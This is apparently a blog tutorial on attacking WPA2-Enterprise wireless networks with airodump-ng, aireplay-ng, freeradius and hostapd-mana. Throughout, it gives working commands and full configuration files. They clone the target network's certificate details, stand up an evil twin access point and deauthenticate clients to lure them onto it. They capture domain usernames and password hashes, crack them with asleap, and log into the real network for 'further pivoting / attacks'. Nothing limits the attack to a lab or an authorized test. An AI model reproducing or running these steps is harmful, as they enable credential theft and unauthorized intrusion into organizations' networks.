There are multiple variations of WPA-2 Enterprise. In this case, the focus is on the tool. This post is about using hostapd-mana and freeradius to create a evil twin network then stealing client credentials
Step 1) Have a wireless card that you can set to monitor mode, then run the commands below:
sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up
Step 2) Then run airodump-ng to gather details about the WiFi network. Obtain the required details below.
sudo airodump-ng wlan0mon
- BSSID –
- Channel –
- ESSID –
Step 3) Stop the process, then run airodump-ng again to gather specific information and Station information. See “Troubleshooting Steps” if no Stations appear.
sudo airodump-ng wlan0mon -c <channel> --bssid <BSSID from Step 2>
- Station –
Step 4) Stop the process, then run airodump-ng again to output the captured traffic to PCAP
sudo airodump-ng -c <channel> --bssid <BSSID from Step 2> -w out wlan0mon
Step 5) Launch another terminal and deauthenticate client, to sniff cert used during authentication
sudo aireplay-ng -0 20 -b <BSSID from Step 2> -h <Station from Step 3> wlan0mon
Step 6) Stop airodump-ng and aireplay-ng, then inspect the PCAP file with Wireshark
sudo wireshark out-01.cap &
Step 7) In Wireshark, use the filter “tls.handshake.certificate”.
Zoom in to the Packet Details > TLSv1 Record Layer > Handshake Protocol > Certificates > Certificate
Right click “Certificate: <super long hex string>” then click Export as Bytes and name it as certificate.der
Step 8) Use openssl to obtain information about the certificate, with special focus on the “Issuer:” section
openssl x509 -inform der -in certificate.der -text
C = countryName
ST = stateOrProvinceName
L = localityName
O = organizationName
emailAddress = self explanatory
CN = commonName
Step 9) Change to root
sudo -s
Step 10) Modify freeradius certificate config
nano /etc/freeradius/3.0/certs/ca.cnf
- Search for, or scroll down to [certificate_authority] section
- Modify the countryName, stateOrProvinceName, localityName, organizationName, emailAddress and commonName to the same content as Step 8
- Note that commonName should be encapsulated in ” “
Step 11) Modify freeradius server config
nano /etc/freeradius/3.0/certs/server.cnf
- Search for, or scroll down to [server] section
- Modify the countryName, stateOrProvinceName, localityName, organizationName, emailAddress and commonName to the same content as Step 8
- Note that commonName should be encapsulated in ” “
Step 12) Create certificate in freeradius by navigating to certs folder, then execute make command
cd /etc/freeradius/3.0/certs
make
Step 13) Create a hostapd-mana eap user config file with the content after the nano command:
nano /etc/hostapd-mana/mana.eap_user
* PEAP,TTLS,TLS,FAST
“t” TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 “pass” [2]
Step 14) Create a hostapd-mana config file with the content after the nano command:
nano /etc/hostapd-mana/mana.conf
#Wireless information
ssid=<ESSID from Step 2>
interface=wlan0
driver=nl80211
channel=<channel from Step 2>
hw_mode=g
#EAP information
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
#Certificate information
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
#Setting nonsensical password to the private key
private_key_password=12345678
dh_file=/etc/freeradius/3.0/certs/dh
#Setting some WPA details
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
#Setting mana config
mana_wpe=1
mana_credout=/tmp/hostapd.credout
mana_eapsuccess=1
mana_eaptls=1
Step 15) Start hostapd-mana
hostapd-mana /etc/hostapd-mana/mana.conf
Step 16) If required, deauthenticate clients from their networks to trick them into joining your rogue network
sudo aireplay-ng -0 5 -b <BSSID from Step 2> wlan0mon
Step 17) Inspect hostapd-mana output, there should be domain\username, and encrypted passwords in ASLEAP, JTR and HASHCAT output.
For simplicity, launch a new terminal, then use ASLEAP to crack passwords, as the whole command is provided from hostapd-mana
sudo asleap -C <first portion> -R <second portion> -W /usr/share/john/password.lst
Step 18) Create a wpa_supplicant config file to be used in step 19:
nano wpa2enterprise.conf
network={
ssid=”INPUT_ESSID_FROM_STEP_2″
scan_ssid=1
key_mgmt=WPA-EAP
identity=”domain\username_FROM_STEP_17″
password=”password_FROM_STEP_17″
eap=PEAP
phase1=”peaplabel=0″
phase2=”auth=MSCHAPV2″
}
Step 19) Connect to the WPA2-Enterprise network using wpa_supplicant
sudo wpa_supplicant -B -i wlan0 -c wpa2enterprise.conf
Step 20) Obtain IP address from the wireless router
sudo dhclient -v wlan0
Step 21) Perform further pivoting / attacks, then disconnect from the network
sudo killall wpa_supplicant